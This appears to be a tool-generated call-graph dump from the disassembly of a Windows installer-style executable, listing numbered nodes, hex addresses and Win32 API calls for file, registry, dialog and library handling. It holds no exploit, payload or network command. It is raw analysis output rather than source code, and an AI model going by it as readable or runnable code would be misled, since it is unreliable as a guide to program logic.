3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3869 4045c4 3780->3869 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 SetClassLongW 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3855 40462b 3796->3855 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3852 40459d 3823->3852 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4045a4 3852->3853 3854 4045aa SendMessageW 3852->3854 3853->3854 3854->3816 3856 4046ee 3855->3856 3857 404643 GetWindowLongW 3855->3857 3856->3794 3857->3856 3858 404658 3857->3858 3858->3856 3859 404685 GetSysColor 3858->3859 3860 404688 3858->3860 3859->3860 3861 404698 SetBkMode 3860->3861 3862 40468e SetTextColor 3860->3862 3863 4046b0 GetSysColor 3861->3863 3864 4046b6 3861->3864 3862->3861 3863->3864 3865 4046c7 3864->3865 3866 4046bd SetBkColor 3864->3866 3865->3856 3867 4046e1 CreateBrushIndirect 3865->3867 3868 4046da DeleteObject 3865->3868 3866->3865 3867->3856 3868->3867 3870 4066a5 17 API calls 3869->3870 3871 4045cf SetDlgItemTextW 3870->3871 3871->3789 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 CloseHandle 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 